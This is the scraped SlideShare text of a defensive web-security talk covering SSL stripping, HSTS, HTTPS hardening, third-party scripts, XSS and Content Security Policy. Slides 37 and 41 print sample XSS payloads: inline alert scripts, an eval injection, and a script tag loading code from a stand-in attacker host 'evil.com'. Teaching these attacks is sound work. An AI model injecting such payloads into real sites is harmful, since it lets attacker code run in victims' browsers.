SlideShare a Scribd company logo

Why Traditional Web Security Technologies no Longer Suffice to Keep You Safe

P
Philippe De Ryck

The slides from an overview presentation of how the Web, and Web security, have changed in the last few years. This talk has been given at various public and private venues. Get in touch if you want to invite me to your company or tech group!

Technology
1 of 50
Download to read offline
Why Traditional Web Security Technologies no Longer Suffice to Keep You Safe Philippe De Ryck @PhilippeDeRyck https://www.websec.be
Which Scenario Would You Trust? (a) Visit website, browse public pages Login with username and password Consult private information Visit website, browse public pages Login with username and password Consult private information Visit website, browse public pages Login with username and password Consult private information (b) (c)
About Me – Philippe De Ryck 3 § Postdoctoral Researcher @ DistriNet (KU Leuven) § PhD on client-side Web security § Expert in the broad field of Web security § Main author of the Primer on Client-Side Web Security § Running the Web Security training program § Dissemination of knowledge and research results § Public training courses and targeted in-house training § Target audiences include industry and researchers § Part of the organizing committee of SecAppDev.org § Week-long course focused on practical security https://www.websec.be@PhilippeDeRyck
The Web Used to Be Server-Centric 5
With a lot of Server-Side Problems 6 http://arstechnica.com/security/2015/12/hackers-actively-exploit-critical-vulnerability-in-sites-running-joomla/
With a lot of Server-Side Problems 7 http://motherboard.vice.com/read/one-of-the-largest-hacks-yet-exposes-data-on-hundreds-of-thousands-of-kids
8
9
10
The Web has Become Client-Centric 11
The Network Can no Longer Be Trusted 12
Networks Are Everywhere 13 § We happily connect to any wifi network we can find § Without knowing who has control over the network § Upstream networks are easily intercepted nowadays § Intercepting proxies at the network perimeter § ISPs inspecting and manipulating traffic § State agencies tapping the backbone
The Communication Channel Is Insecure 14 § People are mainly concerned about eavesdropping attacks § Sniffing usernames, passwords, session identifiers, … § Demonstrated in 2010 by the Firesheep add-on http://codebutler.com/firesheep/
The Communication Channel Is Insecure 15 § People are mainly concerned about eavesdropping attacks § Sniffing usernames, passwords, session identifiers, … § Demonstrated in 2010 by the Firesheep add-on § Generally prevented by using HTTPS for sensitive data § But today, active network attacks are just as easy to execute § Man on the side attacks inject traffic into the network § Man in the middle attacks intercept and manipulate traffic § Simply using HTTPS for sensitive data no longer suffices
Care to Reconsider your Previous Answer? (a) Visit website, browse public pages Login with username and password Consult private information Visit website, browse public pages Login with username and password Consult private information Visit website, browse public pages Login with username and password Consult private information (b) (c)
Averting the Use of HTTPS 17
Stripping HTTPS from Login Forms 18 some-shop.com Visit http://some-shop.com Welcome, please log in Login as Philippe Welcome Philippe Visit http://some-shop.com Welcome, please log in Login as Philippe Welcome Philippe Rewrite HTTPS to HTTP
HTTPS Prevents Man in the Middle Attacks 19 some-shop.com Visit https://some-shop.com Welcome, please log in Login as Philippe Welcome Philippe Visit https://some-shop.com Welcome, please log in Login as Philippe Welcome Philippe
HTTPS Prevents Man in the Middle Attacks? 20 http://news.netcraft.com/archives/2016/03/17/95-of-https-servers-vulnerable-to-trivial-mitm-attacks.html
Bootstrapping the HTTPS Site 21 GET http://some-shop.com 200 OK Response page POST http://some-shop.com GET http://… 301 Moved GET https://… 200 OK Rewrite HTTPS URLs User: philippe & pass: pazzw0rd POST https://… some-shop.com
SSL Stripping Is a Sneaky Attack 22
HTTP Strict Transport Security (HSTS) 23 § Instruct the browser to only visit a site over HTTPS § Once-enabled no HTTP requests will be sent anymore § Prevents SSL stripping attacks § Prevents cookie stealing over HTTP GET https://websec.be websec.be 200 OK Response page
HTTP Strict Transport Security (HSTS) 24 § HSTS is a server-driven browser-enforced security policy § Server sends the Strict-Transport-Security response header § The protection is only applied for the duration of max-age § Make sure this value covers non-frequent visitors § The value 0 disables the HSTS policy for this particular host • Only if received over an error-free channel Strict-Transport-Security: max-age=31536000; includeSubdomains 4 4 7 11From version … 4.4.4 7.1
HSTS in Action 25 GET https://websec.be websec.be 200 OK Response page Strict-Transport-Security: max-age=31536000; includeSubdomains GET https://websec.be 200 OK Response page Strict-Transport-Security: max-age=31536000; includeSubdomains www.websec.be GET https://www.websec.be 200 OK Response page Strict-Transport-Security: max-age=31536000; includeSubdomains
The Bootstrapping Problem … Again 26 GET https://websec.be websec.be 200 OK Response page Strict-Transport-Security: max-age=31536000; includeSubdomains GET https://websec.be 200 OK Response page Strict-Transport-Security: max-age=31536000; includeSubdomains www.websec.be GET https://www.websec.be 200 OK Response page Strict-Transport-Security: max-age=31536000; includeSubdomains
Preloading HSTS 27 § The bootstrapping problem is solved by a preloaded list § Contains all sites that have explicitly subscribed to HSTS § Distributed along with the browsers § Available on https://hstspreload.appspot.com/
HTTPS Should Be Enabled by Default 28 § Browser vendors are strongly pushing towards HTTPS § Firefox marks HTTP pages with password fields as insecure § Google uses HTTPS as a ranking signal in its search engine § Active mixed content is blocked in modern browsers § Chrome and Firefox will support Secure Contexts § A Secure Context is delivered over HTTPS, including its parents § Powerful features will only be exposed to a Secure Context • E.g. Geolocation, microphone and camera access, …
Hardening your HTTPS Deployment 29 § Finetune the supported protocols and ciphers § Disable the old and obsolete SSLv2 and SSLv3 § Avoid the use of old and weak ciphers § Move all your traffic to HTTPS § Immediately redirect all HTTP traffic to HTTPS § Prevent SSL Stripping by enabling Strict Transport Security (HSTS) § If you want to go all out, enable Public Key Pinning (HPKP) § Prevents impersonation attacks with rogue but valid certificates https://www.ssllabs.com/ssltest/
Insecure Third-Party Content Can Be Disastrous 30
Browsers Do More than Rendering HTML 31 § Modern browsers are full-fledged application platforms § Plenty of system features are exposed to Web applications • Battery status, Vibration, Geolocation, Microphone & Camera, … § ChromeOS and FirefoxOS run all applications inside a browser § The key enabler for all of this functionality is JavaScript § Since its introduction in 1995, JS has finally taken over the Web § Plugins like Flash and Silverlight are slowly fading away § So, how about security? § We have the same-origin policy, but it’s 20 years old …
The Same-Origin Policy 32 http://example.com http://example.com http://example.com http://private.example.com http://forum.example.com http://private.example.com SAME-ORIGIN POLICY Content retrieved from one origin can freely interact with other content from that origin, but interactions with content from other origins are restricted ORIGIN The triple <scheme, host, port> derived from the document’s URL. For http://example.org/forum/, the origin is <http, example.org, 80>
Origins, Frames and Scripts 33 § The browser enforces origin-based separation § Frames have a context, a document URL and an associated context § Scripts are loaded into the context of the including page § Classical trade-off between isolation and flexibility http://example.com http://malvertisements.com http://example.com Script code from http://malvertisements.com <iframe src=“http://malvertisements.com/pwnme.html” > <script src=“http://malvertisements.com/pwnme.js” >
The Same-Origin Policy in Practice 34 § Most content integration is script-based § Included directly into the application’s context § Which makes sense for libraries, such as JQuery § But not for standalone third-party components § Every included script is a security risk § Because it has full access to your context § So you have to trust the supplier § And the security of their systems
https://medium.com/@FredericJacobs/the-reuters-compromise-by-the-syrian-electronic-army-6bf570e1a85b
Responsibly Including Third-Party Content 36 § Isolate the content in a context with a different origin § Let the Same-Origin Policy protect you § Enable interaction by exchanging messages between contexts § Further restrict isolated context using the HTML5 Sandbox § Allows you to disable certain features in a framed context § Allows you to place your own content in a unique origin § Verify the integrity of content loaded from a CDN § Enabled by the brand new Subresource Integrity specification § Prevents malware distribution by compromising a CDN https://blogs.dropbox.com/tech/2015/09/csp-third-party-integrations-and-privilege-separation/
With XSS, the Attacker Includes the Code for You 37 Add review Thanks for the review! reviews I can really recommend product X. It is awesome! <script>alert(‘Never gonna let you down!’)</script> Show Reviews Reviews page <html><body>… …</body></html>
38 http://blog.detectify.com/post/39209711597/how-i-got-a-3500-usd-facebook-bug-bounty
39 http://www.zdnet.com/article/ubuntu-forums-hacked-1-82m-logins-email-addresses-stolen/
Traditional XSS Defenses 40 § The server compiles data and code into a single HTML page § XSS causes the browser to mistake data for code § The proper defense is context-sensitive output encoding § Encode for the context where the data will be used § HTML body <h1>DATA</h1> § HTML attributes <div id=‘DATA’> § Stylesheet context body { background-color: DATA;} § Script context alert(“DATA”); § URL context <a href=“http://…?arg=DATA”>
Content Security Policy against XSS 41 <h1>You searched for<script>alert(‘XSS’);</script></h1> XSS WITH INLINE SCRIPTS <h1>You searched for<script src=“https://evil.com/hackme.js”></script></h1> XSS WITH REMOTE SCRIPTS eval('alert("Your query string was ' + unescape(document.location.search) //hello%22);alert(1+%22 + '");'); XSS WITH EVAL
The Essence of CSP 42 § CSP reduces the harm of content injection vulnerabilities § By telling the client where resources should be loaded from § By disabling “dangerous features” by default § CSP is intended as a second line of defense § CSP will become more important in the future § Supporting CSP in your application may be non-trivial § Use of inline script blocks is disallowed § Use of eval is disallowed
Introducing CSP by Example 43 Content-Security-Policy: default-src 'self'; script-src ‘self’ https://cdnjs.cloudflare.com; style-src ‘self’ https://cdnjs.cloudflare.com/…/bootstrap.min.css; EXAMPLE POLICY § A policy consists of a set of directives § Each directive controls a different kind of resource § Policy is delivered as an HTTP header by the server • Alternatively, the meta tag can also be used § Compatible browsers will enforce the policy on the response
CSP is the Security Policy of the Future 44 § CSP has been well received, and evolved quickly § Addition of plugin types, sandbox, child contexts, form destinations § Re-enabling inline script with support for nonces and hashes § Deprecates X-FRAME-OPTIONS header § Supports blocking of mixed content / upgrading insecure requests § CSP level 1 is widely supported by browsers § Support for level 2 is less widespread, but improving rapidly § Chrome makes CSP mandatory for its components § Browser extensions and packaged apps
CSP Violation Reports 45 § CSP can report violations back to the resource server § Allows for fine-tuning of the CSP policy § Gives insights in actual attacks § Enabled by using the report-uri directive § Points to a handler on the server that can process reports Content-Security-Policy: default-src 'self'; report-uri http://some-shop.com/csp-report.cgi EXAMPLE POLICY
The Web has Become Client-Centric 46
Progressive Web Security 47 § Take a progressive stance towards Web security § The Web has become client-centric, and so has Web security § Fully protecting your applications requires the latest technologies § All of these security technologies require explicit action § Training is essential to keep up to date with the latest technologies § Share your experiences, help others advance as well § Set an example on how to do it right
48 I hope you learned something tonight … Now it’s up to you Grab a copy of the slides and share with anyone you can find Read my blog or follow me on Twitter to stay informed about web security Level up with Web security training! All information on https://www.websec.be
Why Traditional Web Security Technologies no Longer Suffice to Keep You Safe Acknowledgements Icons by Visual Pharm (https://icons8.com) Images by Unsplash (https://unsplash.com/)
Why Traditional Web Security Technologies no Longer Suffice to Keep You Safe Philippe De Ryck philippe.deryck@cs.kuleuven.be /in/philippederyck https://www.websec.be @PhilippeDeRyck

Recommended

Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015Francois Marier
 
Securing the Foundation to Secure the Cloud
Securing the Foundation to Secure the CloudSecuring the Foundation to Secure the Cloud
Securing the Foundation to Secure the CloudTrent Adams
 
Harness the power of http headers to secure your web apps
Harness the power of http headers to secure your web appsHarness the power of http headers to secure your web apps
Harness the power of http headers to secure your web appsDaniel Gartmann
 
Securing your EmberJS Application
Securing your EmberJS ApplicationSecuring your EmberJS Application
Securing your EmberJS ApplicationPhilippe De Ryck
 
Csp and http headers
Csp and http headersCsp and http headers
Csp and http headersColdFusionConference
 
Rails security: above and beyond the defaults
Rails security: above and beyond the defaultsRails security: above and beyond the defaults
Rails security: above and beyond the defaultsMatias Korhonen
 
Attacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chainAttacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chainSecuRing
 
Securing your AngularJS Application
Securing your AngularJS ApplicationSecuring your AngularJS Application
Securing your AngularJS ApplicationPhilippe De Ryck
 

Recommended

Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015Francois Marier
 
Securing the Foundation to Secure the Cloud
Securing the Foundation to Secure the CloudSecuring the Foundation to Secure the Cloud
Securing the Foundation to Secure the CloudTrent Adams
 
Harness the power of http headers to secure your web apps
Harness the power of http headers to secure your web appsHarness the power of http headers to secure your web apps
Harness the power of http headers to secure your web appsDaniel Gartmann
 
Securing your EmberJS Application
Securing your EmberJS ApplicationSecuring your EmberJS Application
Securing your EmberJS ApplicationPhilippe De Ryck
 
Csp and http headers
Csp and http headersCsp and http headers
Csp and http headersColdFusionConference
 
Rails security: above and beyond the defaults
Rails security: above and beyond the defaultsRails security: above and beyond the defaults
Rails security: above and beyond the defaultsMatias Korhonen
 
Attacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chainAttacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chainSecuRing
 
Securing your AngularJS Application
Securing your AngularJS ApplicationSecuring your AngularJS Application
Securing your AngularJS ApplicationPhilippe De Ryck
 
Introduction to Mod security session April 2016
Introduction to Mod security session April 2016Introduction to Mod security session April 2016
Introduction to Mod security session April 2016Rahul
 
Analysis of HTTP Security Headers in Turkey
Analysis of HTTP Security Headers in TurkeyAnalysis of HTTP Security Headers in Turkey
Analysis of HTTP Security Headers in TurkeyDr. Emin İslam Tatlı
 
Defense in Depth - Lessons Learned from Securing over 100,000 Drupal Sites
Defense in Depth - Lessons Learned from Securing over 100,000 Drupal SitesDefense in Depth - Lessons Learned from Securing over 100,000 Drupal Sites
Defense in Depth - Lessons Learned from Securing over 100,000 Drupal SitesPantheon
 
Serverless security: attack & defense
Serverless security: attack & defense Serverless security: attack & defense
Serverless security: attack & defenseSecuRing
 
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S... BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...BlueHat Security Conference
 
Security Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training ProgramSecurity Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training ProgramOpenDNS
 
Building&Hacking modern iOS apps
Building&Hacking modern iOS appsBuilding&Hacking modern iOS apps
Building&Hacking modern iOS appsSecuRing
 
Getting Single Page Application Security Right
Getting Single Page Application Security RightGetting Single Page Application Security Right
Getting Single Page Application Security RightPhilippe De Ryck
 
Aws training in bangalore
Aws training in bangalore Aws training in bangalore
Aws training in bangalore apponix123
 
Web Security
Web SecurityWeb Security
Web SecurityADIEFEH
 
NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...
NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...
NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...ThreatReel Podcast
 
Web Security
Web SecurityWeb Security
Web SecurityGerald Villorente
 
The DNS Tunneling Blindspot
The DNS Tunneling BlindspotThe DNS Tunneling Blindspot
The DNS Tunneling BlindspotBrian A. McHenry
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13drewz lin
 
Let's get evil - threat modeling at scale
Let's get evil - threat modeling at scaleLet's get evil - threat modeling at scale
Let's get evil - threat modeling at scaleSecuRing
 
F5 EMEA Webinar Oct'15: http2 how to ease the transition
F5 EMEA Webinar Oct'15: http2 how to ease the transitionF5 EMEA Webinar Oct'15: http2 how to ease the transition
F5 EMEA Webinar Oct'15: http2 how to ease the transitionDmitry Tikhovich
 
Evolution of WAF - Stop Worrying About Vulnerabilities
Evolution of WAF - Stop Worrying About VulnerabilitiesEvolution of WAF - Stop Worrying About Vulnerabilities
Evolution of WAF - Stop Worrying About VulnerabilitiesBrian A. McHenry
 
[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera SoftwareOWASP
 
Standardizing and Strengthening Security to Lower Costs
Standardizing and Strengthening Security to Lower CostsStandardizing and Strengthening Security to Lower Costs
Standardizing and Strengthening Security to Lower CostsOpenDNS
 
PLNOG23 - Paweł Rzepa - Attacking AWS: the full cyber kill chain
PLNOG23 - Paweł Rzepa - Attacking AWS: the full cyber kill chainPLNOG23 - Paweł Rzepa - Attacking AWS: the full cyber kill chain
PLNOG23 - Paweł Rzepa - Attacking AWS: the full cyber kill chainPROIDEA
 
Browser Wars 2019 - Implementing a Content Security Policy
Browser Wars 2019 - Implementing a Content Security PolicyBrowser Wars 2019 - Implementing a Content Security Policy
Browser Wars 2019 - Implementing a Content Security PolicyGeorge Boobyer
 
FullDay Faeder on Friday
FullDay Faeder on Friday FullDay Faeder on Friday
FullDay Faeder on Friday Adam Faeder
 

More Related Content

What's hot

Introduction to Mod security session April 2016
Introduction to Mod security session April 2016Introduction to Mod security session April 2016
Introduction to Mod security session April 2016Rahul
 
Analysis of HTTP Security Headers in Turkey
Analysis of HTTP Security Headers in TurkeyAnalysis of HTTP Security Headers in Turkey
Analysis of HTTP Security Headers in TurkeyDr. Emin İslam Tatlı
 
Defense in Depth - Lessons Learned from Securing over 100,000 Drupal Sites
Defense in Depth - Lessons Learned from Securing over 100,000 Drupal SitesDefense in Depth - Lessons Learned from Securing over 100,000 Drupal Sites
Defense in Depth - Lessons Learned from Securing over 100,000 Drupal SitesPantheon
 
Serverless security: attack & defense
Serverless security: attack & defense Serverless security: attack & defense
Serverless security: attack & defenseSecuRing
 
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S... BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...BlueHat Security Conference
 
Security Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training ProgramSecurity Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training ProgramOpenDNS
 
Building&Hacking modern iOS apps
Building&Hacking modern iOS appsBuilding&Hacking modern iOS apps
Building&Hacking modern iOS appsSecuRing
 
Getting Single Page Application Security Right
Getting Single Page Application Security RightGetting Single Page Application Security Right
Getting Single Page Application Security RightPhilippe De Ryck
 
Aws training in bangalore
Aws training in bangalore Aws training in bangalore
Aws training in bangalore apponix123
 
Web Security
Web SecurityWeb Security
Web SecurityADIEFEH
 
NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...
NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...
NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...ThreatReel Podcast
 
The DNS Tunneling Blindspot
The DNS Tunneling BlindspotThe DNS Tunneling Blindspot
The DNS Tunneling BlindspotBrian A. McHenry
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13drewz lin
 
Let's get evil - threat modeling at scale
Let's get evil - threat modeling at scaleLet's get evil - threat modeling at scale
Let's get evil - threat modeling at scaleSecuRing
 
F5 EMEA Webinar Oct'15: http2 how to ease the transition
F5 EMEA Webinar Oct'15: http2 how to ease the transitionF5 EMEA Webinar Oct'15: http2 how to ease the transition
F5 EMEA Webinar Oct'15: http2 how to ease the transitionDmitry Tikhovich
 
Evolution of WAF - Stop Worrying About Vulnerabilities
Evolution of WAF - Stop Worrying About VulnerabilitiesEvolution of WAF - Stop Worrying About Vulnerabilities
Evolution of WAF - Stop Worrying About VulnerabilitiesBrian A. McHenry
 
[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera SoftwareOWASP
 
Standardizing and Strengthening Security to Lower Costs
Standardizing and Strengthening Security to Lower CostsStandardizing and Strengthening Security to Lower Costs
Standardizing and Strengthening Security to Lower CostsOpenDNS
 
PLNOG23 - Paweł Rzepa - Attacking AWS: the full cyber kill chain
PLNOG23 - Paweł Rzepa - Attacking AWS: the full cyber kill chainPLNOG23 - Paweł Rzepa - Attacking AWS: the full cyber kill chain
PLNOG23 - Paweł Rzepa - Attacking AWS: the full cyber kill chainPROIDEA
 

What's hot (20)

Introduction to Mod security session April 2016
Introduction to Mod security session April 2016Introduction to Mod security session April 2016
Introduction to Mod security session April 2016
 
Analysis of HTTP Security Headers in Turkey
Analysis of HTTP Security Headers in TurkeyAnalysis of HTTP Security Headers in Turkey
Analysis of HTTP Security Headers in Turkey
 
Defense in Depth - Lessons Learned from Securing over 100,000 Drupal Sites
Defense in Depth - Lessons Learned from Securing over 100,000 Drupal SitesDefense in Depth - Lessons Learned from Securing over 100,000 Drupal Sites
Defense in Depth - Lessons Learned from Securing over 100,000 Drupal Sites
 
Serverless security: attack & defense
Serverless security: attack & defense Serverless security: attack & defense
Serverless security: attack & defense
 
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S... BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
 
Security Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training ProgramSecurity Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training Program
 
Building&Hacking modern iOS apps
Building&Hacking modern iOS appsBuilding&Hacking modern iOS apps
Building&Hacking modern iOS apps
 
Getting Single Page Application Security Right
Getting Single Page Application Security RightGetting Single Page Application Security Right
Getting Single Page Application Security Right
 
Aws training in bangalore
Aws training in bangalore Aws training in bangalore
Aws training in bangalore
 
Web Security
Web SecurityWeb Security
Web Security
 
NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...
NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...
NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...
 
Web Security
Web SecurityWeb Security
Web Security
 
The DNS Tunneling Blindspot
The DNS Tunneling BlindspotThe DNS Tunneling Blindspot
The DNS Tunneling Blindspot
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13
 
Let's get evil - threat modeling at scale
Let's get evil - threat modeling at scaleLet's get evil - threat modeling at scale
Let's get evil - threat modeling at scale
 
F5 EMEA Webinar Oct'15: http2 how to ease the transition
F5 EMEA Webinar Oct'15: http2 how to ease the transitionF5 EMEA Webinar Oct'15: http2 how to ease the transition
F5 EMEA Webinar Oct'15: http2 how to ease the transition
 
Evolution of WAF - Stop Worrying About Vulnerabilities
Evolution of WAF - Stop Worrying About VulnerabilitiesEvolution of WAF - Stop Worrying About Vulnerabilities
Evolution of WAF - Stop Worrying About Vulnerabilities
 
[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software
 
Standardizing and Strengthening Security to Lower Costs
Standardizing and Strengthening Security to Lower CostsStandardizing and Strengthening Security to Lower Costs
Standardizing and Strengthening Security to Lower Costs
 
PLNOG23 - Paweł Rzepa - Attacking AWS: the full cyber kill chain
PLNOG23 - Paweł Rzepa - Attacking AWS: the full cyber kill chainPLNOG23 - Paweł Rzepa - Attacking AWS: the full cyber kill chain
PLNOG23 - Paweł Rzepa - Attacking AWS: the full cyber kill chain
 

Similar to Why Traditional Web Security Technologies no Longer Suffice to Keep You Safe

Browser Wars 2019 - Implementing a Content Security Policy
Browser Wars 2019 - Implementing a Content Security PolicyBrowser Wars 2019 - Implementing a Content Security Policy
Browser Wars 2019 - Implementing a Content Security PolicyGeorge Boobyer
 
FullDay Faeder on Friday
FullDay Faeder on Friday FullDay Faeder on Friday
FullDay Faeder on Friday Adam Faeder
 
FullDay on Fridays Feb. 3, 2017
FullDay on Fridays Feb. 3, 2017FullDay on Fridays Feb. 3, 2017
FullDay on Fridays Feb. 3, 2017Adam Faeder
 
Owasp web application security trends
Owasp web application security trendsOwasp web application security trends
Owasp web application security trendsbeched
 
[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar Ganiev[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar GanievOWASP Russia
 
Cisco Connect Halifax 2018 Anatomy of attack
Cisco Connect Halifax 2018 Anatomy of attackCisco Connect Halifax 2018 Anatomy of attack
Cisco Connect Halifax 2018 Anatomy of attackCisco Canada
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Divyanshu
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Cisco connect winnipeg 2018 anatomy of an attack
Cisco connect winnipeg 2018 anatomy of an attackCisco connect winnipeg 2018 anatomy of an attack
Cisco connect winnipeg 2018 anatomy of an attackCisco Canada
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Jeremiah Grossman
 
Java script and web cryptography (cf.objective)
Java script and web cryptography (cf.objective)Java script and web cryptography (cf.objective)
Java script and web cryptography (cf.objective)ColdFusionConference
 
HTTP_Header_Security.pdf
HTTP_Header_Security.pdfHTTP_Header_Security.pdf
HTTP_Header_Security.pdfksudhakarreddy5
 
Top 10 Web Hacks 2013
Top 10 Web Hacks 2013Top 10 Web Hacks 2013
Top 10 Web Hacks 2013Matt Johansen
 
Securing your web application through HTTP headers
Securing your web application through HTTP headersSecuring your web application through HTTP headers
Securing your web application through HTTP headersAndre N. Klingsheim
 
Protecting Web App users in today’s hostile environment
Protecting Web App users in today’s hostile environmentProtecting Web App users in today’s hostile environment
Protecting Web App users in today’s hostile environmentajitdhumale
 
Securing Servers in Public and Hybrid Clouds
Securing Servers in Public and Hybrid CloudsSecuring Servers in Public and Hybrid Clouds
Securing Servers in Public and Hybrid CloudsRightScale
 
Csp and http headers
Csp and http headersCsp and http headers
Csp and http headersdevObjective
 
WordPress London Meetup January 2012
WordPress London Meetup January 2012WordPress London Meetup January 2012
WordPress London Meetup January 2012Cloudflare
 
How to Ensure You're Launching the Most Secure Website - Michael Tremante
How to Ensure You're Launching the Most Secure Website - Michael TremanteHow to Ensure You're Launching the Most Secure Website - Michael Tremante
How to Ensure You're Launching the Most Secure Website - Michael TremanteWP Engine
 
Anatomy Of An Attack
Anatomy Of An AttackAnatomy Of An Attack
Anatomy Of An AttackCisco Canada
 

Similar to Why Traditional Web Security Technologies no Longer Suffice to Keep You Safe (20)

Browser Wars 2019 - Implementing a Content Security Policy
Browser Wars 2019 - Implementing a Content Security PolicyBrowser Wars 2019 - Implementing a Content Security Policy
Browser Wars 2019 - Implementing a Content Security Policy
 
FullDay Faeder on Friday
FullDay Faeder on Friday FullDay Faeder on Friday
FullDay Faeder on Friday
 
FullDay on Fridays Feb. 3, 2017
FullDay on Fridays Feb. 3, 2017FullDay on Fridays Feb. 3, 2017
FullDay on Fridays Feb. 3, 2017
 
Owasp web application security trends
Owasp web application security trendsOwasp web application security trends
Owasp web application security trends
 
[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar Ganiev[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar Ganiev
 
Cisco Connect Halifax 2018 Anatomy of attack
Cisco Connect Halifax 2018 Anatomy of attackCisco Connect Halifax 2018 Anatomy of attack
Cisco Connect Halifax 2018 Anatomy of attack
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Cisco connect winnipeg 2018 anatomy of an attack
Cisco connect winnipeg 2018 anatomy of an attackCisco connect winnipeg 2018 anatomy of an attack
Cisco connect winnipeg 2018 anatomy of an attack
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008
 
Java script and web cryptography (cf.objective)
Java script and web cryptography (cf.objective)Java script and web cryptography (cf.objective)
Java script and web cryptography (cf.objective)
 
HTTP_Header_Security.pdf
HTTP_Header_Security.pdfHTTP_Header_Security.pdf
HTTP_Header_Security.pdf
 
Top 10 Web Hacks 2013
Top 10 Web Hacks 2013Top 10 Web Hacks 2013
Top 10 Web Hacks 2013
 
Securing your web application through HTTP headers
Securing your web application through HTTP headersSecuring your web application through HTTP headers
Securing your web application through HTTP headers
 
Protecting Web App users in today’s hostile environment
Protecting Web App users in today’s hostile environmentProtecting Web App users in today’s hostile environment
Protecting Web App users in today’s hostile environment
 
Securing Servers in Public and Hybrid Clouds
Securing Servers in Public and Hybrid CloudsSecuring Servers in Public and Hybrid Clouds
Securing Servers in Public and Hybrid Clouds
 
Csp and http headers
Csp and http headersCsp and http headers
Csp and http headers
 
WordPress London Meetup January 2012
WordPress London Meetup January 2012WordPress London Meetup January 2012
WordPress London Meetup January 2012
 
How to Ensure You're Launching the Most Secure Website - Michael Tremante
How to Ensure You're Launching the Most Secure Website - Michael TremanteHow to Ensure You're Launching the Most Secure Website - Michael Tremante
How to Ensure You're Launching the Most Secure Website - Michael Tremante
 
Anatomy Of An Attack
Anatomy Of An AttackAnatomy Of An Attack
Anatomy Of An Attack
 

Recently uploaded

Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024The Digital Insurer
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
MINDCTI Revenue Release Quarter One 2024
